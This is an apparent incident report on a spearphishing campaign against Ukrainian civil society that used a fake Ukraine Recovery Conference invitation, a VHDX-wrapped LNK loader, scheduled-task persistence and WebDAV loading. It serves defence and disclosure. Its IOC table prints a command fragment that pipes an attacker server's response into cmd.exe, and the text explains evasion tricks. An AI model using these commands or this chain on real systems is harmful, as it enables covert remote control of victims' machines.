Digital Security Lab Ukraine has uncovered a coordinated spearphishing campaign targeting individual members of Ukrainian civil society organizations (CSO) and initiatives, as well as government officials.
Among the targets are Ukrainian advocacy platforms, journalists, and economists engaged in analytical, communications, and advocacy work on security, Euro-Atlantic integration, the confiscation of Russian assets, accountability for Russian war crimes and Ukraine’s post-war recovery.
Starting on June 10, 2026, threat actors used emails impersonating Paweł Kowal – a Polish politician, Chairman of the EU-Ukraine Parliamentary Cooperation Committee (Wikipedia). He is a highly recognizable figure when it comes to issues related to Ukraine’s recovery, as well as the organization of high-level meetings.
Initial Access: a fake conference invitation
The emails came from a Proton Mail account, “[email protected]”, signed “Pavlo Koval, Ukraine Recovery Conference.” Some parts of the email text reveal that it was translated from Russian. The message invited the recipient to the Ukraine Recovery Conference – a real event that runs every year. This time, the event is scheduled to take place in Gdańsk, Poland.
The real conference sends invitations from “[email protected]”, and its website is https://urc-international[.]com. Neither was involved here. The attackers impersonated the names, titles, and logos of the official event. Official page screenshot:
Delivery on request
The first email had no attachment. It referred to a registration form “in the attached file,” but nothing was attached. The file appeared only after a recipient replied and asked for it. A message with no payload passes mail scanning cleanly, and the loader only reaches people who have already shown they are engaged. It also keeps the sample away from anyone who never replies.
The follow-up email carried the archive, and the body of that reply included an image showing the password to open it. 
Weaponized archive: evasion via Disk Image
The attached file, “URC_2026_Official_Invitation.zip”, is a password-protected ZIP. The password is delivered as an image styled to look like a CAPTCHA.
The ZIP holds one file: “Files.vhdx”, a Virtual Hard Disk (v2). A VHDX behaves like a physical hard drive but exists as a single file. This choice matters. Files opened from a mounted disk image do not carry the “downloaded from the internet” mark that Windows normally attaches, so the usual SmartScreen warning never appears.
Extracting the image exposes three partitions:
0. Microsoft reserved partition.img
1. Basic data partition.fat → holds “URC_2026_Official_Invitation.lnk”
2. Basic data partition.ntfs → (volume label “SecureVault”) → holds the decoy “URC_2026_Official_Invitation.pdf” and a file named “do” containing a script.
Execution – the Loader chain
“URC_2026_Official_Invitation.lnk” looks like a document, with a PDF icon. It launches PowerShell. The trick is that the shortcut stores its own script in the Description field, and the command line reads that field and executes it:
The Description locates the mounted “SecureVault” volume and pipes the “do” script into cmd:
The “do” opens the decoy PDF so the victim sees something plausible, then quietly fetches its next command from a remote server:
The request carries the victim’s domain, computer name, and username inside the URL, with the user-agent “WindowsUpdatesMonitor”. Whatever the server returns is piped straight into cmd and runs. Nothing is saved as a file – it executes in memory.
Persistence
This stage ensures persistence. The base64-encoded PowerShell script registers four scheduled tasks, each on a short timer between 7 and 15 minutes. Together they keep the host calling back to the attacker’s infrastructure over HTTP and WebDAV. Every call sends the same victim fingerprint – domain, hostname, and username joined as `DOMAIN\HOST\USER` encoded as Base64.
Task “SecureDNSObserver” fetches every ten minutes a response from the attacker’s server and pipes it straight into “cmd.exe”. That is an open command channel where the operator can run whatever they want on the host for as long as the task survives.
The other three tasks use the WebDAV delivery method. “net use \\microsoft[.]com\DavWWWRoot” starts the Windows WebClient service – the “DavWWWRoot” keyword forces WebDAV over HTTP instead of SMB, and a legitimate Microsoft host is used only to wake the service.
With the client running, the two “control.exe” tasks load a resource from the attacker’s WebDAV share at “89[.]125[.]66[.]183”. “control.exe” is a legitimate Windows Control Panel process. WebDAV exposes those remote files as ordinary-looking file paths through the WebClient service, so “control.exe” – normally a loader for Control Panel applets, which are DLLs – loads attacker code from the remote share as if it were local.
We were unable to retrieve the next payload through the WebDAV at “89[.]125[.]66[.]183”. The payload it ultimately installs is still unknown and the investigation continues.
Conclusions
This campaign is based on methods that we have repeatedly documented as being used against Ukrainian civil society, linked together in a single chain. Posing as a trusted institution or public figure, hiding the payload in a password-protected archive, and using a Windows shortcut (.lnk) to launch the infection chain – these are all recurring patterns in DSLU’s phishing investigations.
Several elements stand out compared to our previous cases. The first is selective delivery. Initial email contains no malicious attachments. The malicious file is sent only to those who reply. This prevents mass scanning of the sample and avoids detection among those who never interact with the email, making it harder to detect the campaign based on email alone. The second is delivery within a virtual hard disk (VHDX) image, which allows the attackers to bypass Windows built-in protections. The third is selective execution. The final malicious code was not automatically downloaded and executed on all of the victims’ devices.
This practical lesson aligns with our previous conclusions: you cannot rely solely on traditional antivirus software or default protection against this type of attack, since nothing in the chain is a typical virus. Protection comes from behavior – being cautious about invitations from personal email accounts or unofficial channels, never opening password-protected archives, and establishing response procedures for suspicious activity. The targeting remains consistent: individuals and organizations working on security, recovery and support for Ukraine remain the primary focus.
IOCs (Indicators of Compromise):
| URC_2026_Official_Invitation.zip | 99f971a9256dff777dce7c4165b794f9cedbc0e62426351ad31ff6dcb09cf7cd |
| Files.vhdx | 831ef80ba20a69ec20009a33bf39b266932d5d0f85bd761d9fdb1c071cb0e7ee |
| URC_2026_Official_Invitation.lnk | c0004f96f305ae93dd4067c6637c8f4edafb122d4bf4cad7b7e42084a3aa1408 |
| ProtectedFiles/do | 480b5f762a9f8c2a2fe64eb21d27f237a02d6afd9b46fa13a9259bdff9c7e104 |
| Decoy PDF URC_2026_Official_Invitation.pdf | 61f9d54a0808aceeed8a6229252f0d3381df929b97f8f613d6a037290e7b0598 |
| Remote command source | 103[.]160[.]59[.]97 |
| Remote command source | 89[.]125[.]66[.]183 |
| Remote command source | secure-dns-hub[.]com |
| curl User-Agent | WindowsUpdatesMonitor |
| curl User-Agent | DNSObserver |
| URL Template | hxxps://103[.]160[.]59[.]97/miles/windows?us=%userdomain%_%computername%_%username% |
| URL Template | hxxp://secure-dns-hub[.]com/dns/request?ui=$encodedValue -A DNSObserver | cmd.exe |